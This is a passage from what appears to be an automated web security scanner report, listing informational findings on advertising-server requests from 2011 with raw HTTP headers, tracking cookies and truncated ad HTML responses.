52FA%253D6261233%252FR%253D0%252F%252A%2524%26S%3D14445110%26i%3D140477%26D%3Dzip%253D05672%2526ycg%253D%2526yyob%253D%26_salt%3D3283334435%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.yahoo.com%252Fs%252Fprweb%252F20110427%252Fbs_prweb%252Fprweb5276794%26r%3D0,65973c16-744b-11e0-a09d-003048d6d2fe
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 01 May 2011 23:34:26 GMT
Content-Length: 1180

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ads.bluelithium.com/clk?2,13%3B9696cce63f6aaa
...[SNIP]...

33.2. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.16

Request

GET /adi/N3382.Yahoo/B5116950.16;sz=150x30;pc=[TPAS_ID];click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha25jZmtCTDgzNVFtUmduUSxyJDAscmQkMTZpZmY1MGZtKSk/1/*http://global.ard.yahoo.com/SIG=15g2ds2nv/M=999999.999999.999999.999999/D=news/S=96654906:FB/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=iFueFUwN7y4-/J=1304292783275135/K=mbmuBMnyuFXFamzNMr12dQ/A=2394450929415713467/R=0/X=6/*;dcopt=rcl;mtfIFPath=nofile;ord=1304292783.275135? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 01 May 2011 23:33:30 GMT
Content-Length: 1041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjA
...[SNIP]...

33.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:25:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8795

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

33.4. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAHLEWnwIAKEAcsRafAgAoQByxFp8CAChAHLEWnwIAKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-dWh0P9IGCuCoJ9BtI0ZMuxgp1sWK95UJMhZwAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,_PVID%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%26Z%3D300x250%26cb%3D1304292783315180%26x%3Dhttp%253A%252F%252Fglobal%252Eard%252Eyahoo%252Ecom%252FSIG%253D15ps83od6%252FM%253D787833%252E14445110%252E14291877%252E12665044%252FD%253Dnews%252FS%253D96654906%253ALREC2%252FY%253DYAHOO%252FEXP%253D1304299983%252FL%253DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%252FB%253DHqq%255FKEwNPVs%252D%252FJ%253D1304292783315180%252FK%253DmbmuBMnyuFXFamzNMr12dQ%252FA%253D6261233%252FR%253D0%252F%252A%2524%26S%3D14445110%26i%3D140477%26D%3Dzip%253D05672%2526ycg%253D%2526yyob%253D%26_salt%3D3283334435%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.yahoo.com%252Fs%252Fprweb%252F20110427%252Fbs_prweb%252Fprweb5276794%26r%3D0,65973c16-744b-11e0-a09d-003048d6d2fe HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt&ad_type=iframe&ad_size=300x250&site=140477&section_code=14445110&cb=1304292783315180&yud=zip%3D05672%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15ps83od6/M=787833.14445110.14291877.12665044/D=news/S=96654906:LREC2/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=Hqq_KEwNPVs-/J=1304292783315180/K=mbmuBMnyuFXFamzNMr12dQ/A=6261233/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!$-!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xG3/!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#6U!!!!!#<x,:<!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!
(<w[U@!#aG>!!!!'<xD>X!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#g]5!!!!)<xdAS!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#uE=!!!!#<x9#K!#uJY!!!!)<wYiT!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!%<wYiT!#xPu~~!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$'/1!!!!#<wx=%!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(V0!!!!$<xj^Z!$)DI!!!!#<x2wq!$*R!!!!!$<xD>X"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:09 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0418.2rm.ac4
Set-Cookie: ih="b!!!!3!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!#<xjve!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; path=/; expires=Tue, 30-Apr-2013 23:34:09 GMT
Set-Cookie: vuday1=Ajz6%!?-x!@eJsf; path=/; expires=Mon, 02-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!%!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!!E)$!$XwM!,+Z*!#WUS!!!%%!?5%!),1*7!ZmB)!!28h!$8eP~~~~~~<xjve<y+o`M.jTN!!L7_!!E)$!$XwM!,+Z*!#WUS!!!%%!?5%!),1*7!ZmB)!!28h!$8eP~~~~~~<xjve<yi^'M.jTN"; path=/; expires=Tue, 30-Apr-2013 23:34:09 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=t07yR!?-x!TDjBo; path=/; expires=Mon, 02-May-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 01 May 2011 23:34:09 GMT
Pragma: no-cache
Content-Length: 1185
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(5589522);}
</script><IFRAME SRC="htt
...[SNIP]...

33.5. http://ads-vrx.adbrite.com/adserver/display_iab_ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads-vrx.adbrite.com
Path:   /adserver/display_iab_ads

Request

GET /adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934 HTTP/1.1
Host: ads-vrx.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12gg8%2C12ggb%2C6e73"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDg1_T5CRiAk-zNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EIC7iqMKGICT7M0TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@4@4dbe1166@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: text/html
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:39 GMT
Content-Length: 980

<html><head></head><body leftmargin=0 topmargin=0 bgcolor="#FFFFFF"> <!-- eyewonder -->

<script language="JavaScript" src="http://guru.sitescout.com/tag.jsp?pid=66738FF&w=300&h=250&rnd=6848350&cm=h
...[SNIP]...

33.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2193540&PluID=0&w=160&h=600&64cd0da313&ncu=http://d1.openx.org/ck.php?oaparams=2__bannerid=522976__zoneid=0__OXLCA=1__cb=64cd0da313__r_id=85dbdb9e09296233a4d7b328928878f8__r_ts=lkjpfk__oadest=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D%3Bcb%3D1442324580http%253A%252F%252Fwww.zipcar.com%252Fwebchi3col75&ucm=true&ncu=$$%c$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; A3=iQQIaFx503Dk00000iKhqaHW208A300001jj9MaH17066N00001iZLfaFB607pd00001j0InaHlY09sO00001j4HbaE.a0a9y00001jGDhaHW50d8900000jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003jGDjaHWf0d8900000hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002jGaZaHWf0d8900004johvaFxN07uh00002h52YaGZy0ca700001hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWe07aw00001jFY.aHqe0d8900001j2VdaGyd07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001jv+zaH1o0d8900002jFZhaHWf0d8900000jAtnaHq602WG00001iBU1aEBz0aVU000019rW0aFGt04uw00001; B3=9yE10000000000up7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh85Yh0000000001un9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj9yMi0000000000up8Wi10000000001un93M20000000001uf82Np0000000001um9ufH0000000002um99ex0000000001um9yMk0000000000up9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud8Zxy0000000001up9qqo0000000002ui9yDd0000000001un78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh9xwn0000000004up7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000j0InaHlY09sO00001iZLfaFB607pd00001jj9MaH17066N00001iKhqaHW208A300001jGDhaHW50d8900000j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000jGDjaHWf0d8900000gY2paFS+09nl00003hH4jaFhv09wy00001hEIkaItM0bI400001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000jGaZaHWf0d8900004h52YaGZy0ca700001johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWe07aw00001jeoLaF6J07Hs00001jFY.aHqe0d8900001j8QYaEBz07LU00001j2VdaGyd07aw00001jv+zaH1o0d8900002hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001jAtnaHq602WG00001jFZhaHWf0d8900000; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9yE10000000000up8Dka0000000001uh9cTR0000000001uf85Yh0000000001un52BU0000000001ui9abz0000000000ui9yMi0000000000up9eB50000000001uj8TfJ0000000001uh9fJa0000000001ul8ny40000000001uq9ufH0000000002um82Np0000000001um93M20000000001uf8Wi10000000001un9yMk0000000000up99ex0000000001um9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9yDd0000000001un9qqo0000000002ui8Zxy0000000001up9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui9xwn0000000004up; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
